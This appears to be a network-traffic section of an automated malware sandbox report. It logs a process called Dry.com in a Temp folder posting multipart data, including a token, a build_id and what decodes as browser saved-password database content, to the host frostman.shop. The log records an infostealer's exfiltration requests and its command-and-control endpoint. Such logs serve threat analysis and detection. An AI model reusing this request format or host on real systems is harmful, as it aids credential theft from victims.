                                                                                                                                                                                                                                                                          2024-12-21 00:15:14 UTC505OUTData Raw: 2d 2d 2d 2d 2d 2d 30 30 48 56 53 32 4e 59 35 58 42 41 41 41 31 4e 47 34 4f 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 34 34 65 38 36 38 30 38 66 37 34 63 61 31 31 39 66 37 61 36 32 34 33 36 38 34 65 61 62 32 0d 0a 2d 2d 2d 2d 2d 2d 30 30 48 56 53 32 4e 59 35 58 42 41 41 41 31 4e 47 34 4f 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 30 30 48 56 53 32 4e 59 35 58 42 41 41 41 31 4e 47 34 4f 5a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------00HVS2NY5XBAAA1NG4OZContent-Disposition: form-data; name="token"6644e86808f74ca119f7a6243684eab2------00HVS2NY5XBAAA1NG4OZContent-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------00HVS2NY5XBAAA1NG4OZCont
                                                                                                                                                                                                                                                                          2024-12-21 00:15:15 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:15:15 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-12-21 00:15:15 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          20192.168.2.550025116.203.12.1144434952C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:15:15 UTC328OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----SJW4W4OHLXBIEU3EUA1V
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: frostman.shop
                                                                                                                                                                                                                                                                          Content-Length: 213453
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-12-21 00:15:15 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 53 4a 57 34 57 34 4f 48 4c 58 42 49 45 55 33 45 55 41 31 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 34 34 65 38 36 38 30 38 66 37 34 63 61 31 31 39 66 37 61 36 32 34 33 36 38 34 65 61 62 32 0d 0a 2d 2d 2d 2d 2d 2d 53 4a 57 34 57 34 4f 48 4c 58 42 49 45 55 33 45 55 41 31 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 53 4a 57 34 57 34 4f 48 4c 58 42 49 45 55 33 45 55 41 31 56 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------SJW4W4OHLXBIEU3EUA1VContent-Disposition: form-data; name="token"6644e86808f74ca119f7a6243684eab2------SJW4W4OHLXBIEU3EUA1VContent-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------SJW4W4OHLXBIEU3EUA1VCont
                                                                                                                                                                                                                                                                          2024-12-21 00:15:15 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:15 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:15 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:15 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:15 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:15 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:15 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:15 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:15 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:17 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:15:17 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          21192.168.2.550032116.203.12.1144434952C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:15:17 UTC327OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----3EUA1N7YM7GV37Q1VKX4
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: frostman.shop
                                                                                                                                                                                                                                                                          Content-Length: 55081
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-12-21 00:15:17 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 33 45 55 41 31 4e 37 59 4d 37 47 56 33 37 51 31 56 4b 58 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 34 34 65 38 36 38 30 38 66 37 34 63 61 31 31 39 66 37 61 36 32 34 33 36 38 34 65 61 62 32 0d 0a 2d 2d 2d 2d 2d 2d 33 45 55 41 31 4e 37 59 4d 37 47 56 33 37 51 31 56 4b 58 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 33 45 55 41 31 4e 37 59 4d 37 47 56 33 37 51 31 56 4b 58 34 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------3EUA1N7YM7GV37Q1VKX4Content-Disposition: form-data; name="token"6644e86808f74ca119f7a6243684eab2------3EUA1N7YM7GV37Q1VKX4Content-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------3EUA1N7YM7GV37Q1VKX4Cont
                                                                                                                                                                                                                                                                          2024-12-21 00:15:17 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:17 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 42 2f 67 41 4c 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpB/gALQAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:17 UTC6016OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:19 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:15:18 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-12-21 00:15:19 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          22192.168.2.550039116.203.12.1144434952C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:15:19 UTC328OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----PZMY5PHVAI5F3EKF37QQ
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: frostman.shop
                                                                                                                                                                                                                                                                          Content-Length: 142457
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
